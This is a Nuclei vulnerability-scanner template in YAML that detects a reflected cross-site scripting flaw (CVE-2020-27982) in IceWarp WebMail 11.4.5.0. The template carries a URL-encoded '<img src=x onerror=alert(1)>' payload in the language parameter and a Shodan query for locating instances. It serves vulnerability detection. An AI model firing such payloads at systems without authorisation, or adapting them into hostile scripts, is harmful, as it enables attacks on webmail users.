nuclei-templates/cves/2020/CVE-2020-27982.yaml

44 lines
1.2 KiB
YAML

id: CVE-2020-27982
info:
name: IceWarp WebMail 11.4.5.0 - Cross-Site Scripting
author: madrobot
severity: medium
description: IceWarp WebMail 11.4.5.0 is vulnerable to cross-site scripting via the language parameter.
reference:
- https://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
- https://cxsecurity.com/issue/WLB-2020100161
- https://nvd.nist.gov/vuln/detail/CVE-2020-27982
- http://packetstormsecurity.com/files/159763/Icewarp-WebMail-11.4.5.0-Cross-Site-Scripting.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2020-27982
cwe-id: CWE-79
metadata:
shodan-query: title:"icewarp"
tags: xss,icewarp,packetstorm,cve,cve2020
requests:
- method: GET
path:
- "{{BaseURL}}/webmail/?language=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(1)%3E"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<img src=x onerror=alert(1)>"
part: body
- type: word
words:
- "text/html"
part: header
# Enhanced by mp on 2022/08/14